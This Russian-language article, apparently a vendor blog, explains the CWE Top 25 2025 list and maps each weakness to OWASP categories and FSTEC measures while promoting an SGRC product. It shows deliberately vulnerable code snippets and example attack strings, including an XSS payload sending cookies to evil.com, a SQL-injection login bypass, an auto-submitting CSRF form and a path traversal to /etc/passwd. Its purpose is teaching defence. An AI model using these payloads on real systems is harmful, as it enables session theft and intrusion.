CWE Top 25 — рейтинг двадцати пяти самых опасных типов уязвимостей программного обеспечения, который с 2009 года публикует MITRE Corporation совместно с CISA (Агентство по кибербезопасности и безопасности инфраструктуры США). Актуальная версия — CWE Top 25 2025, опубликованная MITRE 29 января 2026 года. Это первый полный русскоязычный разбор новой версии рейтинга с привязкой к БДУ ФСТЭК и мерам защиты из приказов ФСТЭК №117, №21, №239 и №17. Если OWASP Top 10 ориентирован на веб-приложения, то CWE Top 25 охватывает всё программное обеспечение целиком: операционные системы, сетевые сервисы, драйверы, браузеры, мобильные приложения, встраиваемые системы.
TL;DR: Актуальная версия CWE Top 25 от MITRE опубликована 29 января 2026 года. Впервые с 2019 года CWE-79 (XSS) вернулась на первое место (score 60.38), обогнав CWE-787 (Out-of-bounds Write). В ТОП-5 — четыре веб-уязвимости: XSS, SQLi, CSRF и Missing Authorization. Memory-safety уязвимости опустились. Меры ФСТЭК групп АНЗ, УПД, ЗИС, ОЦЛ закрывают большинство 25 типов.
Главный сюжет 2025 года — web-уязвимости и проблемы контроля доступа резко поднялись в рейтинге, а memory-safety опустились. CWE-79 (XSS) впервые с 2019 года вернулась на первое место, обогнав CWE-787 (Out-of-bounds Write), которая лидировала четыре года подряд. Материал рассчитан на специалистов ИБ, разработчиков, аудиторов и руководителей ИТ, работающих с информационными системами под требованиями ФСТЭК. Каждая из 25 типов уязвимостей рассмотрена в привязке к практике: суть, механика атаки, связь с OWASP, меры защиты по российским нормативам и автоматизация через SGRC-платформу КиберОснова.
Что такое CWE Top 25 и зачем он нужен
CWE (Common Weakness Enumeration) — стандартизированный каталог типов уязвимостей ПО, который ведёт MITRE с 2006 года. По состоянию на 2025 год в каталоге более 940 идентификаторов — от базовых ошибок работы с памятью до архитектурных недостатков. Каждая CVE-уязвимость в базе NVD классифицируется по CWE, что превращает CWE в универсальный язык для описания корневых причин уязвимостей. Подробнее о связи CWE и CVSS — в отдельной статье.
Ежегодный рейтинг CWE Top 25 — приоритизированный список самых опасных типов уязвимостей. Практическая польза: приоритизация разработчиков (какие классы ошибок предотвращать в code review), выбор инструментов SAST/DAST (покрытие), оценка зрелости Secure SDLC, моделирование угроз по методике ФСТЭК 2021 года, структура отчётов при аудите.
Методология CWE Top 25 2025
Рейтинг 2025 года построен на анализе 39 080 CVE-записей из NVD (National Vulnerability Database) за период 2023–2024 годов с учётом каталога CISA KEV. MITRE использует прозрачную формулу: Score = Frequency × Severity × 100, где Frequency — нормализованное число CVE данного типа, Severity — средний нормализованный CVSS.
Дополнительно публикуется количество CVE данного типа, попавших в CISA KEV — каталог известных эксплуатируемых уязвимостей, который ведётся с ноября 2021 года. В KEV включаются только те уязвимости, для которых подтверждена активная эксплуатация в дикой природе. Для российских организаций это прямой сигнал: уязвимости CWE из KEV должны устраняться в приоритетном порядке, даже если CVSS не самый высокий.
Отличие CWE Top 25 от OWASP Top 10
OWASP Top 10 — десять категорий рисков для веб-приложений; каждая категория объединяет множество родственных CWE. CWE Top 25 — двадцать пять отдельных типов уязвимостей для всего ПО; ранжирование строится на количественном анализе CVE из NVD и KEV. В версии 2025 года CWE Top 25 заметно сместился в сторону веб-уязвимостей: четыре из пяти лидеров (XSS, SQLi, CSRF, Missing Authorization) — это веб и API. Это сближает оба рейтинга, но они по-прежнему дополняют друг друга. Связь категорий — в разборе OWASP Top 10 и обзоре уязвимостей веб-приложений.
Полный список CWE Top 25 2025 с оценками
Актуальная таблица рейтинга MITRE с официального сайта cwe.mitre.org/top25/archive/2025/. Столбец «KEV» показывает число CVE данного CWE, попавших в CISA KEV Catalog.
| № | CWE | Название (EN / RU) | Score | KEV |
|---|---|---|---|---|
| 1 | CWE-79 | Cross-site Scripting / Межсайтовый скриптинг (XSS) | 60.38 | 7 |
| 2 | CWE-89 | SQL Injection / SQL-инъекция | 28.72 | 4 |
| 3 | CWE-352 | Cross-Site Request Forgery / Подделка межсайтовых запросов (CSRF) | 13.64 | 0 |
| 4 | CWE-862 | Missing Authorization / Отсутствие авторизации | 13.28 | 0 |
| 5 | CWE-787 | Out-of-bounds Write / Запись за границы буфера | 12.68 | 12 |
| 6 | CWE-22 | Path Traversal / Обход пути | 8.99 | 10 |
| 7 | CWE-416 | Use After Free / Использование после освобождения | 8.47 | 14 |
| 8 | CWE-125 | Out-of-bounds Read / Чтение за границы буфера | 7.88 | 3 |
| 9 | CWE-78 | OS Command Injection / Инъекция команд ОС | 7.85 | 20 |
| 10 | CWE-94 | Code Injection / Инъекция кода | 7.57 | 7 |
| 11 | CWE-120 | Classic Buffer Overflow / Классическое переполнение буфера | 6.96 | 0 |
| 12 | CWE-434 | Unrestricted File Upload / Неограниченная загрузка файлов | 6.87 | 4 |
| 13 | CWE-476 | NULL Pointer Dereference / Разыменование нулевого указателя | 6.41 | 0 |
| 14 | CWE-121 | Stack-based Buffer Overflow / Переполнение буфера в стеке | 5.75 | 4 |
| 15 | CWE-502 | Deserialization of Untrusted Data / Десериализация недоверенных данных | 5.23 | 11 |
| 16 | CWE-122 | Heap-based Buffer Overflow / Переполнение буфера в куче | 5.21 | 6 |
| 17 | CWE-863 | Incorrect Authorization / Некорректная авторизация | 4.14 | 4 |
| 18 | CWE-20 | Improper Input Validation / Некорректная проверка входных данных | 4.09 | 2 |
| 19 | CWE-284 | Improper Access Control / Некорректное управление доступом | 4.07 | 1 |
| 20 | CWE-200 | Exposure of Sensitive Information / Раскрытие чувствительной информации | 4.01 | 1 |
| 21 | CWE-306 | Missing Authentication for Critical Function / Отсутствие аутентификации для критической функции | 3.47 | 11 |
| 22 | CWE-918 | Server-Side Request Forgery / Подделка запроса на стороне сервера (SSRF) | 3.36 | 0 |
| 23 | CWE-77 | Command Injection / Инъекция команд | 3.15 | 2 |
| 24 | CWE-639 | Authorization Bypass Through User-Controlled Key / Обход авторизации через подконтрольный ключ | 2.62 | 0 |
| 25 | CWE-770 | Allocation of Resources Without Limits / Выделение ресурсов без ограничений | 2.54 | 0 |
Обратите внимание на главные закономерности версии 2025. Во-первых, лидер CWE-79 (60.38) более чем в два раза опережает занимающую второе место CWE-89 (28.72) — разрыв беспрецедентный за всю историю рейтинга. Во-вторых, четыре из пяти топовых позиций занимают веб-уязвимости и проблемы контроля доступа (XSS, SQLi, CSRF, Missing Authorization), что отражает растущую долю веб-приложений и API в общем числе CVE. В-третьих, memory-safety уязвимости (CWE-787, CWE-416, CWE-125, CWE-120, CWE-121, CWE-122) суммарно занимают шесть позиций, но их совокупный score ниже, чем в предыдущих версиях — C/C++ постепенно вытесняется memory-safe языками вроде Rust в новых проектах.
Что изменилось в CWE Top 25 по сравнению с 2023
Версия 2025 принесла самые крупные перестановки за последние пять лет. Ниже — сводка ключевых изменений в формате changelog.
Перестановки в ТОП-5
- CWE-79 (XSS): 2 место (2023, score 45.54) → 1 место (2025, 60.38). Рост абсолютного значения и возврат на вершину после нескольких лет лидерства Out-of-bounds Write. Причина — взрывной рост числа CVE в JavaScript-фреймворках, low-code платформах, no-code конструкторах и embed-виджетах.
- CWE-89 (SQL Injection): 3 место → 2 место (28.72). Улучшение позиции на одну строку, абсолютный score снизился, но относительная значимость возросла из-за общего падения других категорий.
- CWE-352 (CSRF): 9 место (2023, 11.73) → 3 место (2025, 13.64). Самый резкий скачок в рейтинге — сразу +6 позиций. Связано с массовым переходом на API-first архитектуры, где CSRF-защита часто упускается, и с ростом атак на admin-панели CMS.
- CWE-862 (Missing Authorization): 11 место → 4 место. Рост в основном за счёт ошибок IDOR (Insecure Direct Object Reference) в API российских и международных госуслуг, финтеха, маркетплейсов.
- CWE-787 (Out-of-bounds Write): 1 место (2023, 63.72) → 5 место (2025, 12.68). Падение score в пять раз — самое драматическое изменение. Это не значит, что memory corruption перестали быть опасными: их по-прежнему 12 в KEV. Просто доля среди всех публикуемых CVE снизилась благодаря memory-safe компиляторам, fuzzing'у и переходу на Rust.
Memory-safety опустились
Все memory-corruption CWE сместились вниз: CWE-416 (Use After Free) с 4 на 7 место, CWE-125 (Out-of-bounds Read) с 7 на 8, CWE-78 (OS Command Injection, технически не memory issue, но классическая системная уязвимость) с 5 на 9. Это устойчивый тренд: за последние три версии CWE Top 25 веб-уязвимости постепенно вытесняют системные.
Появились в Top 25 2025
Впервые в рейтинге: CWE-120 Classic Buffer Overflow (#11), CWE-121 Stack-based Buffer Overflow (#14), CWE-122 Heap-based Buffer Overflow (#16) — MITRE пересмотрел методологию и начал учитывать конкретные подтипы CWE-787. CWE-284 Improper Access Control (#19) — обобщающий тип уязвимости контроля доступа. CWE-200 Exposure of Sensitive Information (#20) — раскрытие через API, error messages, логи. CWE-639 Authorization Bypass Through User-Controlled Key (#24) — подвид IDOR. CWE-770 Allocation of Resources Without Limits (#25) — DoS через неограниченное выделение ресурсов.
Выпали из Top 25 2025
CWE-287 (Improper Authentication, был #13) — заменена более конкретными CWE-862 и CWE-863. CWE-190 (Integer Overflow, #14) — компиляторные проверки. CWE-798 (Hard-coded Credentials, #18) — массовое внедрение secret managers (Vault, pre-commit хуки). CWE-362 (Race Condition, #21), CWE-269 (Improper Privilege Management, #22) и CWE-276 (Incorrect Default Permissions, #25) также покинули рейтинг — покрываются более общими CWE или решены защищёнными дефолтами современных дистрибутивов.
Для российского ИБ-специалиста это означает: если вы строили модель угроз и план мер защиты по версии 2023, нужен пересмотр приоритетов. Web-application security и API authorization теперь требуют максимального внимания. Memory-safety не исчезла, но стала чуть менее острой проблемой.
Топ-10 самых опасных CWE: подробный разбор
Далее — глубокий разбор каждой из первых десяти типов уязвимостей в версии 2025. Места 1–5 рассмотрены полностью с примерами кода и мерами ФСТЭК, места 6–10 — сжато.
1. CWE-79 — Межсайтовый скриптинг (Cross-site Scripting, XSS)
Score 60.38, 7 CVE в KEV. Лидер CWE Top 25 2025. Самый распространённый тип уязвимостей веб-приложений и одна из старейших проблем безопасности. Возврат на первое место после нескольких лет лидерства Out-of-bounds Write — главное событие версии 2025.
Суть проблемы и пример кода
Приложение принимает недоверенные данные от пользователя и включает их в HTML-страницу без экранирования. Браузер жертвы исполняет эти данные как JavaScript от имени атакуемого сайта. Результат — кража сессионных cookie, перехват CSRF-токенов, подмена форм, фишинг внутри доверенного домена, заражение malware.
app.get('/search', (req, res) => {
res.send(`<h1>Результаты для: ${req.query.q}</h1>`);
});
Если в параметре q передать <script>fetch('//evil.com?c='+document.cookie)</script>, этот скрипт выполнится в браузере каждого, кто откроет URL. Существуют три типа: Reflected (через URL), Stored (сохранённый на сервере, наиболее опасный) и DOM-based (обработка в JS на клиенте).
Связь с OWASP и меры ФСТЭК
Категория A03:2021 — Injection. Подробный разбор с CSP-заголовками и санитизацией — в статье Защита от XSS (CWE-79). В БДУ ФСТЭК — тысячи записей в CMS (WordPress, Bitrix), admin-панелях, low-code платформах, личных кабинетах госуслуг.
Меры ФСТЭК: АНЗ.1 (DAST-сканирование), ЗИС.17 (фильтрация содержимого), ОЦЛ.4 (контроль информации в выводе), ОЦЛ.5 (контроль входящих данных). В SGRC-платформе КиберОснова дашборд CWE Top 25 2025 показывает XSS-уязвимости из БДУ, привязанные к активам, с автоматическим SLA по приказу №117.
2. CWE-89 — SQL-инъекция (SQL Injection)
Score 28.72, 4 CVE в KEV. Второе место. Одна из трёх самых разрушительных уязвимостей веб-приложений: одна успешная атака может привести к полной компрометации базы, утечке миллионов записей ПДн и оборотным штрафам по 420-ФЗ.
Суть и пример кода
Приложение формирует SQL-запрос путём конкатенации строк с пользовательским вводом без параметризации. Атакующий меняет структуру запроса: добавляет условия, объединяет таблицы через UNION, извлекает данные из information_schema.
def login(username, password):
query = f"SELECT * FROM users WHERE login='{username}' AND password='{password}'"
return db.execute(query)
Ввод admin' OR '1'='1 в поле username превращает запрос в SELECT * FROM users WHERE login='admin' OR '1'='1' — аутентификация проходит без знания пароля.
Связь с OWASP и меры ФСТЭК
Категория A03:2021 — Injection. Полный разбор с семью методами защиты — в статье Защита от SQL-инъекций (CWE-89). В БДУ ФСТЭК — тысячи записей в 1С-Битрикс, российских CMS, ERP-системах, банковских кабинетах.
Меры ФСТЭК: АНЗ.1 (SAST и DAST), ЗИС.17 (WAF), ОЦЛ.5 (контроль входящих данных), ЗНИ.1 (защита от НСД к БД). Запросите демо КиберОснова — покажем дашборд CWE Top 25 2025 с распределением SQL-инъекций по активам и SLA по приказу №117.
3. CWE-352 — Подделка межсайтовых запросов (CSRF)
Score 13.64, 0 CVE в KEV. Третье место и самый резкий скачок в рейтинге — с 9 на 3 позицию. Атакующий обманом заставляет браузер жертвы выполнить действие на доверенном сайте, используя активную сессию. Классический сценарий: пользователь залогинен в интернет-банке, открывает вредоносную страницу, которая через скрытую форму отправляет перевод.
Суть и пример атаки
<form action="https://bank.ru/transfer" method="POST">
<input name="to" value="evil">
<input name="amount" value="10000">
</form>
<script>document.forms[0].submit();</script>
Приложение принимает запросы на изменение состояния (перевод денег, смена пароля) без проверки, что запрос инициирован самим пользователем, а не сторонним сайтом через cookie сессии.
Почему CSRF взлетела в 2025
Массовый переход на API-first архитектуры и SPA, где разработчики упускают CSRF-защиту, считая её нужной только для form-based приложений. На практике cookie-based сессии в SPA одинаково уязвимы. Плюс рост числа CVE в admin-панелях CMS (WordPress, Bitrix, OpenCart).
Защита: CSRF-токены (синхронизируемые с сессией), SameSite-атрибут cookie, double-submit cookies, кастомные AJAX-заголовки, проверка Origin и Referer. Категория OWASP A01:2021 (Broken Access Control).
Меры ФСТЭК: ЗИС.17 (проверка источника запроса), УПД.13 (управление сессиями), ИАФ.1 (идентификация и аутентификация), АНЗ.1 (DAST).
4. CWE-862 — Отсутствие авторизации (Missing Authorization)
Score 13.28, 0 CVE в KEV. Четвёртое место, поднялась с 11. Критичная функция или API-endpoint доступны без проверки прав пользователя. Самый распространённый пример — IDOR (Insecure Direct Object Reference): смена ID в URL даёт доступ к чужим данным.
Суть и пример кода
Приложение проверяет аутентификацию (валидная сессия), но не проверяет права на доступ к конкретному ресурсу. Характерно для REST API, где разработчик полагается на предположение «о ID знает только владелец».
app.get('/api/orders/:id', requireAuth, async (req, res) => {
const order = await db.orders.findOne({ id: req.params.id });
res.json(order); // нет проверки order.userId === req.user.id
});
Атакующий перебирает ID в /api/orders/123, /api/orders/124 и получает чужие заказы с ПДн.
Почему критично для российского рынка
В 2024–2025 годах несколько громких утечек ПДн в российских маркетплейсах, банковских приложениях и сервисах доставки произошли именно через IDOR. Эти инциденты подпадают под оборотные штрафы 420-ФЗ и могут стоить сотни миллионов рублей. Категория OWASP A01:2021 (Broken Access Control) и API1:2023 (BOLA) в OWASP API Security Top 10 — топ-1 угроза для API.
Меры ФСТЭК: УПД.1 (управление учётными записями), УПД.2 (разграничение полномочий), УПД.4 (разделение полномочий), УПД.13 (управление сеансами).
5. CWE-787 — Запись за границы буфера (Out-of-bounds Write)
Score 12.68, 12 CVE в KEV. Пятое место. Бывший лидер четыре года подряд, в 2025 опустился сразу на четыре позиции. Наиболее опасный класс уязвимостей для системного ПО, браузеров, ядер ОС и сетевых сервисов.
Суть и пример кода
Программа записывает данные за пределы выделенного буфера памяти. В C/C++ это приводит к перезаписи соседних данных: переменных, указателей, адресов возврата, метаданных heap. Последствия — от DoS до RCE через классические переполнения стека и heap.
void copy_data(char *input) {
char buffer[64];
strcpy(buffer, input); // нет проверки длины input
}
Если input длиннее 64 байт, запись выйдет за пределы стека, перезапишет адрес возврата и перехватит управление.
Почему упала в рейтинге
Снижение с 63.72 до 12.68 объясняется тремя факторами: внедрение memory-safe языков (Rust в системных компонентах Microsoft, Google, Linux kernel); fuzzing-тестирование (libFuzzer, OSS-Fuzz); пересмотр методологии MITRE с выделением подтипов CWE-120, CWE-121, CWE-122. Категория OWASP A06:2021 (Vulnerable and Outdated Components).
Меры ФСТЭК: АНЗ.1 (статический и динамический анализ), АНЗ.2 (обновления безопасности), ОЦЛ.1 (контроль целостности ПО), ЗИС.3 (изоляция процессов). По приказу №117 уязвимости с высоким CVSS из KEV требуют устранения в приоритетном порядке. Модуль БДУ ФСТЭК ежедневно отслеживает новые записи CWE-787 и автоматически назначает SLA.
6. CWE-22 — Обход пути (Path Traversal)
Score 8.99, 10 CVE в KEV. Шестое место (ранее 8). Классическая уязвимость веб-приложений: атакующий через символы ../ выходит за пределы допустимой директории и получает доступ к произвольным файлам сервера. Запрос ?file=../../../../etc/passwd читает системный файл паролей. Часто комбинируется с Arbitrary File Upload для полного захвата сервера. Меры ФСТЭК: АНЗ.1, УПД.2, ЗИС.17. Категория OWASP A01.
7. CWE-416 — Использование после освобождения (Use After Free)
Score 8.47, 14 CVE в KEV. Седьмое место (ранее 4). Программа освобождает участок памяти, но продолжает использовать указатель на него. При атаке злоумышленник контролирует содержимое перевыделенной памяти и получает произвольное чтение/запись. Типичная эксплуатация — heap spraying в браузерах, часто комбинируется с type confusion для RCE из песочницы. Меры ФСТЭК: АНЗ.1 (статический анализ Coverity, PVS-Studio, Svace), АНЗ.2, ОЦЛ.1.
8. CWE-125 — Чтение за границы буфера (Out-of-bounds Read)
Score 7.88, 3 CVE в KEV. Восьмое место. Зеркальная к CWE-787: чтение, а не запись за границы. Не даёт произвольного выполнения кода, но открывает утечку чувствительных данных — содержимого памяти процесса, криптографических ключей, токенов. Классический пример — Heartbleed (CVE-2014-0160) в OpenSSL. Меры ФСТЭК: АНЗ.1 (fuzzing), ЗИС.3 (изоляция), ОЦЛ.1.
9. CWE-78 — Инъекция команд ОС (OS Command Injection)
Score 7.85, 20 CVE в KEV — максимум среди всех CWE Top 25 2025. Девятое место (ранее 5). Приложение передаёт пользовательский ввод в системный shell без экранирования. Через метасимволы (;, |, &&, $(...)) атакующий добавляет свои команды. Главный вектор первоначального доступа при атаках на сетевое оборудование (Fortinet, Ivanti Connect Secure, Citrix NetScaler), IoT, NAS, VPN-шлюзы. Несмотря на падение в рейтинге, остаётся самым эксплуатируемым типом уязвимости — 20 KEV-записей. Все российские ИБ-команды должны держать её под особым контролем. Меры ФСТЭК: АНЗ.1, ЗИС.17, УПД.2.
10. CWE-94 — Инъекция кода (Code Injection)
Score 7.57, 7 CVE в KEV. Десятое место (ранее 23 — сильный рост). Приложение исполняет строку как код через eval, exec, динамический require, шаблонизаторы со server-side template injection. Наиболее характерно для Python, PHP, JavaScript, Ruby. Резкий подъём связан с атаками на CI/CD (Jenkins, GitLab Runner) и низкокодовые платформы. Меры ФСТЭК: АНЗ.1, запрет использования eval в code review, ЗИС.17. Категория OWASP A03.
Краткий разбор CWE 11–25
Типы уязвимостей с 11 по 25 позиции — всё ещё опасные и широко встречающиеся. Ниже краткое описание каждой с ключевыми мерами ФСТЭК.
11. CWE-120 — Классическое переполнение буфера (Classic Buffer Overflow)
Новая запись в Top 25 2025. Родительский CWE для CWE-121 и CWE-122. Часто используется в БДУ, когда точный подвид неизвестен. Меры: АНЗ.1, АНЗ.2, ОЦЛ.1.
12. CWE-434 — Неограниченная загрузка файлов (Unrestricted File Upload)
Приложение позволяет загрузить файл произвольного типа в директорию, доступную для исполнения веб-сервером. Результат — веб-shell. Защита: белый список расширений, проверка MIME-типа, размещение вне web-root, отключение исполнения скриптов. Меры: АНЗ.1, ЗИС.17, ОЦЛ.4, ЗНИ.5. OWASP A04, A05.
13. CWE-476 — Разыменование нулевого указателя (NULL Pointer Dereference)
Программа обращается к указателю, который может быть NULL, без предварительной проверки. Приводит к аварийному завершению процесса (DoS). В ядрах ОС и драйверах может эксплуатироваться для эскалации привилегий. Меры: АНЗ.1, ОЦЛ.1.
14. CWE-121 — Переполнение буфера в стеке (Stack-based Buffer Overflow)
Новая запись 2025. Подвид CWE-787, локализованный в стековой памяти. Классический вектор атак на C-программы с перехватом адреса возврата. Защиты: stack canary, ASLR, NX/DEP, CFI. Меры: АНЗ.1, АНЗ.2, ОЦЛ.1.
15. CWE-502 — Десериализация недоверенных данных (Deserialization of Untrusted Data)
Приложение десериализует объект из внешнего источника без проверки. В Java, PHP, Python, .NET это даёт RCE через gadget chains. Эксплуатировалось в Spring4Shell, Log4j, WebLogic. Меры: АНЗ.1, ЗИС.17, ОЦЛ.5. OWASP A08.
16. CWE-122 — Переполнение буфера в куче (Heap-based Buffer Overflow)
Новая запись 2025. Подвид CWE-787 в куче. Эксплуатация через heap spraying, метаданные heap, fastbin/tcache. Меры: АНЗ.1, АНЗ.2, ОЦЛ.1.
17. CWE-863 — Некорректная авторизация (Incorrect Authorization)
Авторизация выполняется, но содержит логические ошибки: неверная проверка роли, обход через параметры, проверка только на клиенте. Отличается от CWE-862 наличием самой проверки. Меры: УПД.2, УПД.4, АНЗ.1. OWASP A01.
18. CWE-20 — Некорректная проверка входных данных (Improper Input Validation)
Обобщающая CWE: недостаточная или некорректная валидация пользовательского ввода. Корневая причина для многих других CWE. Меры: АНЗ.1, ОЦЛ.5, ЗИС.17.
19. CWE-284 — Некорректное управление доступом (Improper Access Control)
Новая запись 2025. Родительская CWE для CWE-862 и CWE-863. Используется, когда конкретный подтип некорректного контроля доступа не определён. Меры: УПД.1, УПД.2, УПД.4. OWASP A01.
20. CWE-200 — Раскрытие чувствительной информации (Exposure of Sensitive Information)
Новая запись 2025. Утечка данных через подробные сообщения об ошибках, debug-эндпоинты, log-файлы, заголовки HTTP, API responses, лишние поля JSON. Меры: ОЦЛ.4 (контроль защищаемой информации в выводе), ЗИС.17, АНЗ.1. OWASP A02.
21. CWE-306 — Отсутствие аутентификации для критической функции (Missing Authentication for Critical Function)
Административный интерфейс, API управления, диагностические endpoint доступны без аутентификации. Часто в SCADA/PLC, сетевом оборудовании, IoT, Kubernetes dashboard. Меры: ИАФ.1, ИАФ.3, УПД.13.
22. CWE-918 — Подделка запроса на стороне сервера (SSRF)
Приложение выполняет HTTP-запрос по URL, заданному пользователем, без валидации. Атакующий заставляет сервер обращаться к внутренним ресурсам: metadata endpoints облачных провайдеров, внутренним сервисам за периметром, localhost. Меры: ЗИС.17, УПД.2, white-list целевых хостов. OWASP A10.
23. CWE-77 — Инъекция команд (Command Injection)
Более общая форма CWE-78: инъекция команд не только в shell ОС, но и в любые интерпретаторы (SMTP, LDAP, XPath, NoSQL, GraphQL). Меры: АНЗ.1, ЗИС.17, ОЦЛ.5. OWASP A03.
24. CWE-639 — Обход авторизации через подконтрольный ключ (Authorization Bypass Through User-Controlled Key)
Новая запись 2025. Подвид IDOR: API использует пользовательский идентификатор из URL/тела запроса как ключ доступа без дополнительной проверки. Например, /api/profile?user_id=42 — меняем на ?user_id=43 и читаем чужой профиль. Меры: УПД.1, УПД.2, УПД.4. OWASP A01, API1.
25. CWE-770 — Выделение ресурсов без ограничений (Allocation of Resources Without Limits)
Новая запись 2025. Приложение позволяет выделить неограниченное количество памяти, файловых дескрипторов, потоков, соединений. Используется для DoS-атак. Классические примеры — ZIP-bomb, billion-laughs (XML), GraphQL nested queries без depth limit. Меры: ЗИС.17 (rate limiting), АНЗ.1, ОЦЛ.5.
Маппинг CWE Top 25 2025 на OWASP Top 10 и меры ФСТЭК
Единая таблица для специалистов ИБ: соответствие CWE из Top 25 2025, категорий OWASP Top 10 2021 и мер защиты из приказов ФСТЭК. Используется при моделировании угроз, планировании аудитов и оценке покрытия мерами защиты.
| CWE | OWASP | Ключевые меры ФСТЭК | Приказы |
|---|---|---|---|
| CWE-79 | A03 | АНЗ.1, ЗИС.17, ОЦЛ.5, ОЦЛ.4 | №117, №21 |
| CWE-89 | A03 | АНЗ.1, ЗИС.17, ЗНИ.1 | №117, №239, №21 |
| CWE-352 | A01 | ЗИС.17, УПД.13, ИАФ.1, АНЗ.1 | №117, №21 |
| CWE-862 | A01 | УПД.1, УПД.2, УПД.4, УПД.13 | №117, №21, №239 |
| CWE-787 | A06 | АНЗ.1, АНЗ.2, ОЦЛ.1 | №117, №239, №21 |
| CWE-22 | A01 | АНЗ.1, УПД.2, ЗИС.17 | №117, №21 |
| CWE-416 | A06 | АНЗ.1, АНЗ.2, ОЦЛ.1 | №117, №239 |
| CWE-125 | A02 | АНЗ.1, ЗИС.3, ОЦЛ.1 | №117, №239 |
| CWE-78 | A03 | АНЗ.1, ЗИС.17, УПД.2 | №117, №239, №21 |
| CWE-94 | A03 | АНЗ.1, ЗИС.17 | №117, №21 |
| CWE-120 | A06 | АНЗ.1, АНЗ.2, ОЦЛ.1 | №117, №239 |
| CWE-434 | A04, A05 | АНЗ.1, ЗИС.17, ОЦЛ.4, ЗНИ.5 | №117, №21 |
| CWE-476 | A06 | АНЗ.1, ОЦЛ.1 | №117, №239 |
| CWE-121 | A06 | АНЗ.1, АНЗ.2, ОЦЛ.1 | №117, №239 |
| CWE-502 | A08 | АНЗ.1, ЗИС.17, ОЦЛ.5 | №117, №239 |
| CWE-122 | A06 | АНЗ.1, АНЗ.2, ОЦЛ.1 | №117, №239 |
| CWE-863 | A01 | УПД.2, УПД.4, АНЗ.1 | №117, №21 |
| CWE-20 | A03, A04 | АНЗ.1, ОЦЛ.5, ЗИС.17 | №117, №21 |
| CWE-284 | A01 | УПД.1, УПД.2, УПД.4 | №117, №21, №239 |
| CWE-200 | A02 | ОЦЛ.4, ЗИС.17, АНЗ.1 | №117, №21 |
| CWE-306 | A07 | ИАФ.1, ИАФ.3, УПД.13 | №117, №21, №239 |
| CWE-918 | A10 | ЗИС.17, УПД.2 | №117, №21 |
| CWE-77 | A03 | АНЗ.1, ЗИС.17, ОЦЛ.5 | №117, №21 |
| CWE-639 | A01 | УПД.1, УПД.2, УПД.4 | №117, №21 |
| CWE-770 | A04 | ЗИС.17, АНЗ.1, ОЦЛ.5 | №117, №21 |
Таблица показывает, что несколько групп мер ФСТЭК закрывают большую часть CWE Top 25 2025:
- АНЗ.1 (выявление уязвимостей) — упоминается почти в каждой строке. Базовая мера: регулярное сканирование кода, сети, приложений.
- УПД.1/2/4/13 (управление доступом и сессиями) — закрывают все CWE контроля доступа, которых в версии 2025 стало значительно больше.
- ЗИС.17 (фильтрация на шлюзе) — эффективна против инъекций, SSRF, path traversal, CSRF, raft-limiting.
- ОЦЛ.4 и ОЦЛ.5 (контроль целостности данных на входе и выходе) — закрывают XSS, SQLi, утечки данных.
Полный каталог мер с формулировками — в статье Меры защиты информации ФСТЭК.
Как использовать CWE Top 25 2025 в работе ИБ-специалиста
CWE Top 25 — не просто список для чтения, а рабочий инструмент, применяемый на всех этапах жизненного цикла безопасности.
При моделировании угроз по методике ФСТЭК 2021 — CWE Top 25 2025 служит готовым чеклистом. Для каждой информационной системы проверяете, какие из 25 типов уязвимостей применимы к её компонентам. Если есть веб-интерфейс — обязательно XSS, SQLi, CSRF. Если REST API — Missing Authorization, IDOR, BOLA. Если есть загрузка файлов — CWE-434, десериализация — CWE-502.
При приоритизации мер защиты — в версии 2025 максимальный эффект на рубль бюджета даёт фокус на web-application security (XSS, SQLi, CSRF), API authorization (Missing Auth, IDOR, BOLA) и patch management для систем с памятью (CWE-787, CWE-416). Меры группы АНЗ, ЗИС и УПД покрывают большую часть Top 25.
При работе с отчётами сканеров — отечественные сертифицированные ФСТЭК сканеры (RedCheck, MaxPatrol VM, ScanOval) и статические анализаторы (PVS-Studio, Svace) классифицируют находки по CWE. Группировка по CWE Top 25 2025 помогает выделить критичные находки из тысяч записей: обычно 40–60% попадают в Top 25, и именно с них стоит начинать.
При работе с БДУ ФСТЭК — реестр БДУ классифицирует каждую уязвимость по CWE. Это упрощает фильтрацию записей по CWE Top 25 2025 и получение списка актуальных уязвимостей именно тех типов, которые критичны. КиберОснова SGRC автоматизирует фильтрацию: дашборд показывает, сколько новых уязвимостей из CWE Top 25 2025 появилось за неделю, по каким активам, с каким SLA по приказу №117.
При обучении разработчиков — CWE Top 25 — основа для Secure Code Training. Вместо изучения всех 940 CWE команда фокусируется на 25 самых опасных. После обновления до версии 2025 особенно важно переориентировать обучение на web-security и контроль доступа в API.
Как КиберОснова автоматизирует работу с CWE Top 25 2025
SGRC-платформа КиберОснова интегрирует CWE Top 25 2025 в единый цикл управления уязвимостями и соответствием ФСТЭК.
Классификация БДУ по CWE. Модуль БДУ ФСТЭК ежедневно синхронизируется с bdu.fstec.ru и импортирует записи с CWE-классификацией. Доступны фильтры по конкретной CWE, по группе Top 25 2025, по вхождению в CISA KEV. Специалист видит не «85 000 уязвимостей вообще», а «120 уязвимостей CWE-79 в активах за последнюю неделю». Каталог CWE на русском доступен онлайн.
Дашборд покрытия CWE Top 25 2025 мерами защиты. Для каждой из 25 CWE показано, какие меры ФСТЭК из плана защиты её закрывают и каков процент внедрения. Красным выделены CWE без покрытия — мгновенный гэп-анализ. После публикации версии 2025 платформа автоматически перестроила приоритеты под новых лидеров рейтинга (XSS, SQLi, CSRF, Missing Authorization).
Привязка к активам и расчёт SLA. Каждая уязвимость автоматически сопоставляется с ИТ-активами. Рассчитывается SLA по приказу ФСТЭК №117: критические — 24 часа, высокие — 7 дней, средние — 30 дней. Для CWE из CISA KEV SLA автоматически ужесточается. Автоматический маппинг на OWASP Top 10 используется в отчётах перед руководством и при плановых проверках ФСТЭК.
Запросите демо КиберОснова — покажем, как дашборд CWE Top 25 2025 работает в реальной SGRC-платформе с данными вашей организации. Демо занимает 40 минут и включает работу с БДУ, дашборд CWE, расчёт SLA по приказу №117, отчётность для регуляторов.
FAQ
Какая CWE самая опасная в 2025 году по версии MITRE
